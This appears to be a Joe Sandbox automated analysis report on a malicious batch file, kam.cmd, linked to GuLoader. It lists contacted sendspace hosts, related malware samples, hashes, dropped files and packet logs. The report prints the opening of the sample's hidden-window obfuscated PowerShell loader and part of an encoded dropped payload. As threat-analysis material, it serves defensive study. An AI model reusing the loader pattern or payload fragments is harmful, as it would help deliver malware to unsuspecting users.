              • Avira URL Cloud: safe
              		unknown
              https://www.sendspace.compowershell.exe, 00000002.00000002.2120955065.00000289A62C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E3B000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              172.67.170.105
              		www.sendspace.comUnited States
              		13335CLOUDFLARENETUSfalse
              69.31.136.53
              		fs12n5.sendspace.comUnited States
              		3257GTT-BACKBONEGTTDEfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1446778
              Start date and time:2024-05-23 21:02:39 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 4s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:kam.cmd
              Detection:MAL
              Classification:mal84.troj.evad.winCMD@7/6@3/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 7
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .cmd
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 5256 because it is empty
              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: kam.cmd

              Simulations

              Behavior and APIs

              TimeTypeDescription
              15:03:27API Interceptor46x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              172.67.170.105xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                  windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                    file.vbsGet hashmaliciousGuLoader, XWormBrowse
                      time.vbsGet hashmaliciousGuLoaderBrowse
                        file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                          69.31.136.53zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                              las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                las.cmdGet hashmaliciousGuLoaderBrowse
                                  upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                    update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                      time.vbsGet hashmaliciousGuLoaderBrowse
                                        file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                          https://www.sendspace.com/pro/dl/hg4kq5Get hashmaliciousUnknownBrowse
                                            QRONSFGYUOPMWE.vbsGet hashmaliciousUnknownBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.sendspace.comzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 104.21.28.80
                                              xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                              • 172.67.170.105
                                              las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 172.67.170.105
                                              las.cmdGet hashmaliciousGuLoaderBrowse
                                              • 104.21.28.80
                                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                              • 104.21.28.80
                                              upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 104.21.28.80
                                              update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 104.21.28.80
                                              file.vbsGet hashmaliciousGuLoaderBrowse
                                              • 104.21.28.80
                                              windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                              • 104.21.28.80
                                              windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 172.67.170.105
                                              fs12n5.sendspace.comzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 69.31.136.53
                                              las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 69.31.136.53

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              GTT-BACKBONEGTTDEzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 69.31.136.53
                                              xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                              • 69.31.136.53
                                              las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 69.31.136.53
                                              las.cmdGet hashmaliciousGuLoaderBrowse
                                              • 69.31.136.53
                                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                              • 69.31.136.57
                                              upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 69.31.136.53
                                              update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 69.31.136.53
                                              file.vbsGet hashmaliciousGuLoaderBrowse
                                              • 69.31.136.17
                                              windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                              • 69.31.136.17
                                              windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 69.31.136.57
                                              CLOUDFLARENETUSzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 104.21.28.80
                                              http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                              • 104.21.46.101
                                              xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                              • 172.67.170.105
                                              las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 172.67.170.105
                                              https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recordingGet hashmaliciousUnknownBrowse
                                              • 104.18.72.113
                                              https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                              • 162.247.243.29
                                              Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
                                              • 172.67.171.37
                                              Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              LHER000698175.xlsGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              2300-02998.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.138.9

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0ezap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              S28BW-420120416270,pdf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              Dextron Group PO.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              las.cmdGet hashmaliciousGuLoaderBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              044f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              Wgdebahewafthr.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53
                                              hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.170.105
                                              • 69.31.136.53

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                              MD5:DA1F22117B9766A1F0220503765A5BA5
                                              SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                              SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                              SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:@...e.................................R..............@..........

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tc2pmvdp.lku.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvi3zpu5.hum.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6222
                                              Entropy (8bit):3.712862125951217
                                              Encrypted:false
                                              SSDEEP:96:HUzCXoVkvhkvCCtLfvuSvHcM4fvuSqHcMl:HUYmLfvSfvE
                                              MD5:CDF63A1B0CFEC851C38278B79AFB7641
                                              SHA1:B8BD42F983A50C586F21DB494DA19759E7FE0C05
                                              SHA-256:16809D80E05CCD32A4AD5B820E5A6F393CDDB9ACD519AB05E3CA909FD8C9E8A1
                                              SHA-512:B0332CC3920FD0031FAD3CB3CA0EA71388D088286B4CC5083D0C87F6D7DEA695DE96B44A81F130BCBB8C93552BFF45836F5C92AD1B91D823F0C49FC3B9BC3C36
                                              Malicious:false
                                              Reputation:low
                                              Preview:...................................FL..................F.".. ...d......DQm.C...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....99..C....(..C.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Xk.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Xi...Roaming.@......DWSl.Xi.....C.......................l.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Xg.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Xg.....E......................F-.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Xg.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Xg.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Xm.....q...........

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PSWVXT58HAM3K69OF0H1.temp

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6222
                                              Entropy (8bit):3.712862125951217
                                              Encrypted:false
                                              SSDEEP:96:HUzCXoVkvhkvCCtLfvuSvHcM4fvuSqHcMl:HUYmLfvSfvE
                                              MD5:CDF63A1B0CFEC851C38278B79AFB7641
                                              SHA1:B8BD42F983A50C586F21DB494DA19759E7FE0C05
                                              SHA-256:16809D80E05CCD32A4AD5B820E5A6F393CDDB9ACD519AB05E3CA909FD8C9E8A1
                                              SHA-512:B0332CC3920FD0031FAD3CB3CA0EA71388D088286B4CC5083D0C87F6D7DEA695DE96B44A81F130BCBB8C93552BFF45836F5C92AD1B91D823F0C49FC3B9BC3C36
                                              Malicious:false
                                              Reputation:low
                                              Preview:...................................FL..................F.".. ...d......DQm.C...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....99..C....(..C.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Xk.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Xi...Roaming.@......DWSl.Xi.....C.......................l.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Xg.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Xg.....E......................F-.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Xg.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Xg.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Xm.....q...........

                                              C:\Users\user\AppData\Roaming\Tchick.Ite

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):409100
                                              Entropy (8bit):5.926622986286069
                                              Encrypted:false
                                              SSDEEP:6144:cpxMcfqJyydmQ3CPY+PC82Xx8/gtXL7mZEaFuxHBSWgHn6Doc2dIFqGyVrtAvdI7:cplAr3CgYCBXKYFP2pgLY6gWMwDs
                                              MD5:96FAB9E17EC0F9527A26D76802465E61
                                              SHA1:A3D34FB91B0F8003C4814694BA1B661B6802B17E
                                              SHA-256:87C04C3F17540640E7AE0BC45C700CCCA0D3803487A1B1202F3F8D389067A76C
                                              SHA-512:C42101E2DEF0DF367B8C55081A60572C6D2B1DD94E6E9DE153D2F56A769BE75F207B0D0A9A0BFCE0C344757B29418F093CAA62DA74918897F2C815720847CFBF
                                              Malicious:false
                                              Preview:cQGb6wLMtbue8gwA6wJqNXEBmwNcJARxAZtxAZu58DBhbXEBm3EBm4Hx+0rz03EBm+sCJ8KBwfWFbUFxAZtxAZvrAliJcQGbumCk1/FxAZvrAskB6wJaB3EBmzHK6wI7snEBm4kUC3EBm+sCSiDR4usCMMLrAnxRg8EEcQGb6wIcBIH5IoC1AnzK6wKCJHEBm4tEJATrAmDycQGbicPrAhpvcQGbgcNVghQB6wIcTHEBm7p+MoUZ6wIHwesCmUaB8rV3o5HrAsydcQGbgerLRSaIcQGbcQGb6wKZn3EBm3EBm+sC+sWLDBDrAn6Y6wLEk4kME+sCjMHrAq3KQnEBm+sCi9GB+vijBAB10+sCSq3rAqrYiVwkDOsC/7/rAvurge0AAwAA6wL97nEBm4tUJAjrAt5VcQGbi3wkBOsCWVrrAiQvievrApzB6wJF7IHDnAAAAOsClntxAZtTcQGbcQGbakBxAZtxAZuJ63EBm+sCSPbHgwABAAAAgMUC6wKufnEBm4HDAAEAAHEBm3EBm1NxAZvrAjq7ievrArxW6wIyfYm7BAEAAHEBm+sCKIGBwwQBAADrAvPm6wJ7vVNxAZtxAZtq/3EBm3EBm4PCBXEBm3EBmzH26wKHJXEBmzHJ6wLxFHEBm4sa6wKfhusCd85BcQGbcQGbORwKdfTrAnC76wKTREZxAZvrAsWIgHwK+7h13esCSerrAgxRi0QK/HEBm3EBmynw6wLdMOsCa13/0usCjnRxAZu6+KMEAHEBm+sCiE0xwOsCuQLrAhFSi3wkDOsCHaJxAZuBNAfUawNUcQGb6wIVr4PABHEBm3EBmznQdeXrAjwBcQGbiftxAZvrAp5y/9dxAZvrAvE7UJyHql2OgrjbfDFSVa8MQOZtVt0x0stZlVGCpbWxCcdVmorJ9QyClSzelmVQsYafEy8OVOWw6v1VHw5UrdSuzlCggiDZawZ3nvf1kM3qd1nUJkRae1Pb1RWs2Obc6uqX

                                              Static File Info

                                              General

                                              File type:ASCII text, with very long lines (6205), with no line terminators
                                              Entropy (8bit):5.262293353188707
                                              TrID:
                                                File name:kam.cmd
                                                File size:6'205 bytes
                                                MD5:37b176c0abc29ec74dede88ced6e4cf1
                                                SHA1:4aed169208162c12f26dfbe68e94e6781afcc47e
                                                SHA256:7a5335537efdf7a6becc59c61912dd6b2b56ac7a2e9315b32a0dc3f8ac500fc5
                                                SHA512:e8c36cf60ec4ac67dc60e30e8c60b58e12bd4ab522b8990faf038931bc5c93f41b144cc947847e23f09c163cf273f973d5162bf3f37b1c00f2ff7e19c54c5603
                                                SSDEEP:192:qFS6GncJ3ovYJpHx+WHCNQWq/HncI1yiRj:qFS6Gq3AYJ/+AWqPncyX
                                                TLSH:99D13B1A561412BD9ECF16A46E5B4B3B2E30649B21151101EF7FEBC94CCCE6433AEC4B
                                                File Content Preview:start /min powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningske

                                                File Icon

                                                Icon Hash:9686878b929a9886

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 23, 2024 21:03:28.987565041 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:28.987607956 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:28.987684965 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:29.026655912 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:29.026679039 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:29.553886890 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:29.554024935 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:29.558120012 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:29.558146000 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:29.558518887 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:29.570417881 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:29.614510059 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:29.843539953 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:29.843713045 CEST44349704172.67.170.105192.168.2.5
                                                May 23, 2024 21:03:29.843780041 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:29.846805096 CEST49704443192.168.2.5172.67.170.105
                                                May 23, 2024 21:03:29.868391991 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:29.868433952 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:29.868505955 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:29.868930101 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:29.868942022 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:30.693945885 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:30.694111109 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:30.697659016 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:30.697676897 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:30.697954893 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:30.699136972 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:30.746503115 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.051395893 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.051422119 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.051436901 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.051666975 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.051683903 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.051734924 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.082320929 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.082351923 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.082520962 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.082535982 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.082681894 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.130800962 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.130827904 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.130906105 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.130920887 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.130961895 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.151904106 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.151927948 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.151982069 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.151993990 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.152033091 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.152053118 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.166723967 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.166750908 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.166824102 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.166832924 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.166867971 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.185106039 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.185136080 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.185208082 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.185220003 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.185259104 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.230724096 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.230756998 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.230952024 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.230964899 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.231039047 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.241946936 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.241974115 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.242055893 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.242069006 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.242129087 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.258702993 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.258730888 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.258856058 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.258867979 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.258920908 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.552970886 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.552998066 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.553137064 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.553152084 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.553263903 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.559691906 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.559715986 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.559782028 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.559794903 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.559809923 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.559828043 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.567876101 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.567900896 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.568007946 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.568021059 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.568094969 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.573585033 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.573640108 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.573788881 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.573807955 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.573862076 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.581394911 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.581459045 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.581501007 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.581511974 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.581573963 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.581592083 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.587049961 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.587070942 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.587130070 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.587141037 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.587177992 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.591645956 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.591672897 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.591728926 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.591741085 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.591813087 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.597851038 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.597873926 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.597959042 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.597969055 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.598007917 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.602240086 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.602263927 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.602432013 CEST49705443192.168.2.569.31.136.53
                                                May 23, 2024 21:03:31.602442980 CEST4434970569.31.136.53192.168.2.5
                                                May 23, 2024 21:03:31.602523088 CEST49705443192.168.2.569.31.136.53
